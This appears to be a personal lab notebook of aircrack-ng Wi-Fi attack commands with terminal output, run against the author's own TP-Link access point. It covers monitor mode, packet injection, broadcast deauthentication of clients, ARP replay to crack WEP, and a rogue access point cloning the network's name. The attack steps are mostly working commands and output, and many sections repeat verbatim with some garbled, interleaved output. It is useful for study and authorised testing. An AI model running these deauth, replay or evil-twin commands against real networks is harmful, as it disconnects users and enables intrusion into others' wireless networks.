Wi-Fi Penetrative Testing Commands
$ cat monitor_mode.py
import osos.system("sudo airmon-ng start wlp9s0")
$ sudo python3 monitor_mode.py
Found 4 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode
PID Name
1127 avahi-daemon
1136 NetworkManager
1170 wpa_supplicant
1174 avahi-daemon
PHY Interface Driver Chipset
phy0 wlp9s0 iwlwifi Intel Corporation Wi-Fi 6 AX200 (rev 1a)
(mac80211 monitor mode vif enabled for [phy0]wlp9s0 on [phy0]wlp9s0mon)
(mac80211 station mode vif disabled for [phy0]wlp9s0)
$ iwconfig
lo no wireless extensions.
enp0s31f6 no wireless extensions.
wlp9s0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=-2147483648 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
$ iwconfig
lo no wireless extensions.
enp0s31f6 no wireless extensions.
wlp9s0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=-2147483648 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
lo no wireless extensions.
enp0s31f6 no wireless extensions.
wlp9s0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=-2147483648 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
$ iwconfig
lo no wireless extensions.
enp0s31f6 no wireless extensions.
wlp9s0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=-2147483648 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
$ iwconfig
lo no wireless extensions.
enp0s31f6 no wireless extensions.
wlp9s0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=-2147483648 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
###################################################################################
$ sudo aireplay-ng --test wlan0mon
###################################################################################
19:00:49 Trying broadcast probe requests...
19:00:49 Injection is working!
19:00:51 Found 3 APs
19:00:51 Trying directed probe requests...
19:00:51 18:A6:F7:FE:09:A2 - channel: 13 - '1 I am Iron Man'
19:00:57 0/30: 0%
19:00:57 34:98:B5:07:25:00 - channel: 13 - 'NETGEAR07250D'
19:01:03 0/30: 0%
19:01:03 44:A5:6E:CB:58:C1 - channel: 11 - 'bridge_vlan-10'
19:01:09 0/30: 0%
############################################################################
MAC Address of the Cheap TP Link AP
############################################################################
18:a6:f7:fe:09:a2
lo no wireless extensions.
enp0s31f6 no wireless extensions.
wlp9s0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=-2147483648 dBm
Retry short limit:7 RTS thr:off Fragment thr:off
Power Management:on
###################################################################################
$ sudo aireplay-ng --test wlan0mon
###################################################################################
19:00:49 Trying broadcast probe requests...
19:00:49 Injection is working!
19:00:51 Found 3 APs
19:00:51 Trying directed probe requests...
19:00:51 18:A6:F7:FE:09:A2 - channel: 13 - '1 I am Iron Man'
19:00:57 0/30: 0%
19:00:57 34:98:B5:07:25:00 - channel: 13 - 'NETGEAR07250D'
19:01:03 0/30: 0%
19:01:03 44:A5:6E:CB:58:C1 - channel: 11 - 'bridge_vlan-10'
19:01:09 0/30: 0%
############################################################################
MAC Address of the Cheap TP Link AP
############################################################################
18:a6:f7:fe:09:a2
Command to find out which channel an AP with below BSSID is running on:
###################################################################################sudo airodump-ng --bssid 18:a6:f7:fe:09:a2 wlp9s0mon
CH 7 ][ Elapsed: 1 min ][ 2022-09-09 19:06
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
18:A6:F7:FE:09:A2 -46 88 0 0 13 65 OPN 1 I am Iron Man <=== It's running on channel 13 and SSID is as displayed.
BSSID STATION PWR Rate Lost Frames Notes Probes
Packet injection
###################################################################################(wlan.bssid==18:a6:f7:fe:09:a2) && (wlan.fc.type_subtype==0x08)
###############################################################################
This command will inject packets in the air directed towards the above mentioned TP link AP.
###############################################################################
$ sudo aireplay-ng -9 -e "1 I am Iron Man" -a 18:a6:f7:fe:09:a2 wlp9s0mon -D -x 12
19:29:02 Trying broadcast probe requests...
19:29:02 Injection is working!
19:29:04 Found 1 AP
19:29:04 Trying directed probe requests...
19:29:04 18:A6:F7:FE:09:A2 - channel: 0 - '1 I am Iron Man'
19:29:10 0/30: 0%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Note: -D option ensures that even if AP is not on, the packet injector would still push the packets to the air with the
dest mac as the BSSID of that AP.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Sending De-auth to All the Connected Clients of an AP using packet injection via aireplay-ng tool
########################################################################################################
sudo aireplay-ng -0 5 -a 18:a6:f7:fe:09:a2 --ignore-negative wlp9s0mon
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ When the above command is issued, Deauth frame is sent to all the Stations of the
@ AP.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
16:38:01 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:02 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:02 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:03 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:03 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:04 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:04 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:05 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:05 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:05 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:06 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:06 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:07 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:07 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:08 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:08 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Command to view the list of clients connected to an AP:
The airodump-ng tool prepares the list of connected clients to the AP by reading the
MAC address from the QOA Data packets.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
airodump-ng -c 13 -a --bssid 18:a6:f7:fe:09:a2 wlp9s0mon
#######################################################################################
WEP : By pass shared key authentication
#######################################################################################
1. Use this command to check, which Channel the AP is currently in...
sudo airodump-ng wlp9s0mon
Output:
########################################################################################################################
CH 2 ][ Elapsed: 6 s ][ 2022-09-20 12:04
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
80:CC:9C:8D:D8:7F -36 2 0 0 10 360 WPA2 CCMP PSK <length: 0>
34:98:B5:07:25:00 -27 12 0 0 13 270 WPA2 CCMP PSK NETGEAR07250D
1A:0C:6B:5C:C9:F7 -29 3 0 0 8 360 WPA2 CCMP PSK NETGEAR-Guest-endurance
16:0C:6B:5C:C9:F7 -30 7 2 0 8 360 WPA2 CCMP PSK ORBI86-endurance
18:A6:F7:FE:09:A2 -31 9 0 0 13 54e. WEP WEP 1 I am Tony Stark <==================== The AP is in channel 13.
46:37:86:F3:72:C9 -32 2 0 0 8 360 WPA2 CCMP PSK NETGEAR-Guest-endurance
3C:37:86:F3:72:C9 -32 6 0 0 8 360 WPA2 CCMP PSK <length: 0>
42:37:86:F3:72:C9 -32 4 0 0 8 360 WPA2 CCMP PSK ORBI86-endurance
C8:9E:43:1A:EB:29 -33 2 0 0 6 360 WPA3 CCMP OWE <length: 0>
C8:9E:43:1A:EB:21 -40 2 0 0 6 360 WPA2 CCMP PSK ecizo-1
C8:9E:43:1A:EB:23 -37 2 0 0 6 360 WPA2 CCMP PSK ecizo-vlan3333
C8:9E:43:1A:EB:22 -35 2 0 0 6 360 OPN ecizo-vlan999
2. Now, check for the above AP, the list of Clients connected to that AP.
sudo airodump-ng --bssid 18:A6:F7:FE:09:A2 --channel 13 --write "1 I am Tony Stark" wlp9s0mon
Output:
############################################################################################################################
CH 13 ][ Elapsed: 30 s ][ 2022-09-20 12:07
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER
18:A6:F7:FE:09:A2 -31 100 329 85 0 13 54e. WEP WEP
BSSID STATION PWR Rate Lost Frames Note
18:A6:F7:FE:09:A2 04:F1:28:3E:80:E7 -33 54e- 1e 399 75 <===== This is the MAC address of the STA connected to the AP.
3. The fundamental basis of cracking WEP is that we would need more data packets that are encrypted with same key,
to exploit the weakness in the WEP protocol. This can be done by sending repeated ARP packets to this AP.
Since, ARP packet has fixed protocol header, using aireplay tool, we can replay the ARP packets sent
from the connected STA to the AP.
Command for ARP Spoofing:
###############################################################################################################
sudo aireplay-ng -3 -b 18:A6:F7:FE:09:A2 -h 04:F1:28:3E:80:E7 wlp9s0mon
Output:
Read 66766 packets (got 2677 ARP requests and 35030 ACKs), sent 15987 packRead 66826 packets (got 2682 ARP requests and 35033 ACKs), sent 16037 packRead 66868 packets (got 2686 ARP requests and 35040 ACKs), sent 16086 packRead 66925 packets (got 2691 ARP requests and 35046 ACKs), sent 16136 packRead 66971 packets (got 2696 ARP requests and 35049 ACKs), sent 16187 packRead 67081 packets (got 2700 ARP requests and 35062 ACKs), sent 16236 pack^Cs...(499 pps)
Note: If ARP packet count is not increment, forcefully, inject a deauth packet for that STA to AP and the STA would disconnect and on re-connection ARP
would be triggered by the STA and then, the aireplay-ng tool which is already running, would spoof the packet. INTERESTING STUFF !!!!
4. Now, start the WEP cracking:
#################################################################################################
aircrack-ng replay_arp-0920-142804.cap
Output:
##################################################################################################
Reading packets, please wait...
Opening replay_arp-0920-142804.cap
Read 8 packets.
# BSSID ESSID Encryption
1 18:A6:F7:FE:09:A2 WEP (0 IVs)
Choosing first network as target.
Reading packets, please wait...
Opening replay_arp-0920-142804.cap
Read 8 packets.
1 potential targets
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 8 ivs.
Aircrack-ng 1.6
[00:00:00] TesAircrack-ng 1.6 (got 8 IVs)
KB depth byte(vote)
0 7/ 8[00:00:00] TesAircrack-ng 1.6 (got 8 IVs)
1 0/ 3 33( 256) 58( 256) 91( 256) A5( 256)
KB depth byte(vote)0( 256) 59( 256) 94( 256)
0 0/ 2[00:00:03] TesAircrack-ng 1.6 (got 8 IVs)
1 0/ 1 10( 256) 58( 256) 91( 256) A5( 256)
KB depth byte(vote)0( 256) 59( 256) 94( 256)
0 0/ 2[00:00:03] TesAircrack-ng 1.6 (got 8 IVs)
1 0/ 1 10( 256) 58( 256) 91( 256) A5( 256)
KB depth byte(vote)0( 256) 59( 256) 94( 256)
0 0/ 2[00:00:04] Tested 164353 keys (got 8 IVs)
1 0/ 1 10( 256) 58( 256) 91( 256) A5( 256)
KB depth byte(vote)0( 256) 59( 256) 94( 256)
0 255/256 FF( 0) 00( 0) 01( 0) 02( 0)
1 7/ 14 E4( 256) 00( 0) 01( 0) 02( 0)
2 7/ 2 EE( 256) 00( 0) 01( 0) 02( 0)
3 7/ 3 F2( 256) 00( 0) 01( 0) 02( 0)
4 0/ 1 49( 512) 44( 256) 68( 256) A5( 256)
Failed. Next try with 5000 IVs.
##########################################################################################
Command to create a Rouge Access point with same ESSID and different BSSID and MAC Address
##########################################################################################
sudo airbase-ng --essid "1 I am Iron Man" --channel 13 wlp9s0mon
###############################################################################
This command will inject packets in the air directed towards the above mentioned TP link AP.
###############################################################################
$ sudo aireplay-ng -9 -e "1 I am Iron Man" -a 18:a6:f7:fe:09:a2 wlp9s0mon -D -x 12
19:29:02 Trying broadcast probe requests...
19:29:02 Injection is working!
19:29:04 Found 1 AP
19:29:04 Trying directed probe requests...
19:29:04 18:A6:F7:FE:09:A2 - channel: 0 - '1 I am Iron Man'
19:29:10 0/30: 0%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Note: -D option ensures that even if AP is not on, the packet injector would still push the packets to the air with the
dest mac as the BSSID of that AP.
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Sending De-auth to All the Connected Clients of an AP using packet injection via aireplay-ng tool
########################################################################################################
sudo aireplay-ng -0 5 -a 18:a6:f7:fe:09:a2 --ignore-negative wlp9s0mon
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ When the above command is issued, Deauth frame is sent to all the Stations of the
@ AP.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
16:38:01 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:02 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:02 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:03 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:03 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:04 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:04 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:05 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:05 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:05 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:06 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:06 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:07 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:07 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:08 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
16:38:08 Sending DeAuth (code 7) to broadcast -- BSSID: [18:A6:F7:FE:09:A2]
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Command to view the list of clients connected to an AP:
The airodump-ng tool prepares the list of connected clients to the AP by reading the
MAC address from the QOA Data packets.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
airodump-ng -c 13 -a --bssid 18:a6:f7:fe:09:a2 wlp9s0mon
#######################################################################################
WEP : By pass shared key authentication
#######################################################################################
1. Use this command to check, which Channel the AP is currently in...
sudo airodump-ng wlp9s0mon
Output:
########################################################################################################################
CH 2 ][ Elapsed: 6 s ][ 2022-09-20 12:04
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
80:CC:9C:8D:D8:7F -36 2 0 0 10 360 WPA2 CCMP PSK <length: 0>
34:98:B5:07:25:00 -27 12 0 0 13 270 WPA2 CCMP PSK NETGEAR07250D
1A:0C:6B:5C:C9:F7 -29 3 0 0 8 360 WPA2 CCMP PSK NETGEAR-Guest-endurance
16:0C:6B:5C:C9:F7 -30 7 2 0 8 360 WPA2 CCMP PSK ORBI86-endurance
18:A6:F7:FE:09:A2 -31 9 0 0 13 54e. WEP WEP 1 I am Tony Stark <==================== The AP is in channel 13.
46:37:86:F3:72:C9 -32 2 0 0 8 360 WPA2 CCMP PSK NETGEAR-Guest-endurance
3C:37:86:F3:72:C9 -32 6 0 0 8 360 WPA2 CCMP PSK <length: 0>
42:37:86:F3:72:C9 -32 4 0 0 8 360 WPA2 CCMP PSK ORBI86-endurance
C8:9E:43:1A:EB:29 -33 2 0 0 6 360 WPA3 CCMP OWE <length: 0>
C8:9E:43:1A:EB:21 -40 2 0 0 6 360 WPA2 CCMP PSK ecizo-1
C8:9E:43:1A:EB:23 -37 2 0 0 6 360 WPA2 CCMP PSK ecizo-vlan3333
C8:9E:43:1A:EB:22 -35 2 0 0 6 360 OPN ecizo-vlan999
2. Now, check for the above AP, the list of Clients connected to that AP.
sudo airodump-ng --bssid 18:A6:F7:FE:09:A2 --channel 13 --write "1 I am Tony Stark" wlp9s0mon
Output:
############################################################################################################################
CH 13 ][ Elapsed: 30 s ][ 2022-09-20 12:07
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER
18:A6:F7:FE:09:A2 -31 100 329 85 0 13 54e. WEP WEP
BSSID STATION PWR Rate Lost Frames Note
18:A6:F7:FE:09:A2 04:F1:28:3E:80:E7 -33 54e- 1e 399 75 <===== This is the MAC address of the STA connected to the AP.
3. The fundamental basis of cracking WEP is that we would need more data packets that are encrypted with same key,
to exploit the weakness in the WEP protocol. This can be done by sending repeated ARP packets to this AP.
Since, ARP packet has fixed protocol header, using aireplay tool, we can replay the ARP packets sent
from the connected STA to the AP.
Command for ARP Spoofing:
###############################################################################################################
sudo aireplay-ng -3 -b 18:A6:F7:FE:09:A2 -h 04:F1:28:3E:80:E7 wlp9s0mon
Output:
Read 66766 packets (got 2677 ARP requests and 35030 ACKs), sent 15987 packRead 66826 packets (got 2682 ARP requests and 35033 ACKs), sent 16037 packRead 66868 packets (got 2686 ARP requests and 35040 ACKs), sent 16086 packRead 66925 packets (got 2691 ARP requests and 35046 ACKs), sent 16136 packRead 66971 packets (got 2696 ARP requests and 35049 ACKs), sent 16187 packRead 67081 packets (got 2700 ARP requests and 35062 ACKs), sent 16236 pack^Cs...(499 pps)
Note: If ARP packet count is not increment, forcefully, inject a deauth packet for that STA to AP and the STA would disconnect and on re-connection ARP
would be triggered by the STA and then, the aireplay-ng tool which is already running, would spoof the packet. INTERESTING STUFF !!!!
4. Now, start the WEP cracking:
#################################################################################################
aircrack-ng replay_arp-0920-142804.cap
Output:
##################################################################################################
Reading packets, please wait...
Opening replay_arp-0920-142804.cap
Read 8 packets.
# BSSID ESSID Encryption
1 18:A6:F7:FE:09:A2 WEP (0 IVs)
Choosing first network as target.
Reading packets, please wait...
Opening replay_arp-0920-142804.cap
Read 8 packets.
1 potential targets
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 8 ivs.
Aircrack-ng 1.6
[00:00:00] TesAircrack-ng 1.6 (got 8 IVs)
KB depth byte(vote)
0 7/ 8[00:00:00] TesAircrack-ng 1.6 (got 8 IVs)
1 0/ 3 33( 256) 58( 256) 91( 256) A5( 256)
KB depth byte(vote)0( 256) 59( 256) 94( 256)
0 0/ 2[00:00:03] TesAircrack-ng 1.6 (got 8 IVs)
1 0/ 1 10( 256) 58( 256) 91( 256) A5( 256)
KB depth byte(vote)0( 256) 59( 256) 94( 256)
0 0/ 2[00:00:03] TesAircrack-ng 1.6 (got 8 IVs)
1 0/ 1 10( 256) 58( 256) 91( 256) A5( 256)
KB depth byte(vote)0( 256) 59( 256) 94( 256)
0 0/ 2[00:00:04] Tested 164353 keys (got 8 IVs)
1 0/ 1 10( 256) 58( 256) 91( 256) A5( 256)
KB depth byte(vote)0( 256) 59( 256) 94( 256)
0 255/256 FF( 0) 00( 0) 01( 0) 02( 0)
1 7/ 14 E4( 256) 00( 0) 01( 0) 02( 0)
2 7/ 2 EE( 256) 00( 0) 01( 0) 02( 0)
3 7/ 3 F2( 256) 00( 0) 01( 0) 02( 0)
4 0/ 1 49( 512) 44( 256) 68( 256) A5( 256)
Failed. Next try with 5000 IVs.
##########################################################################################
Command to create a Rouge Access point with same ESSID and different BSSID and MAC Address
##########################################################################################
sudo airbase-ng --essid "1 I am Iron Man" --channel 13 wlp9s0mon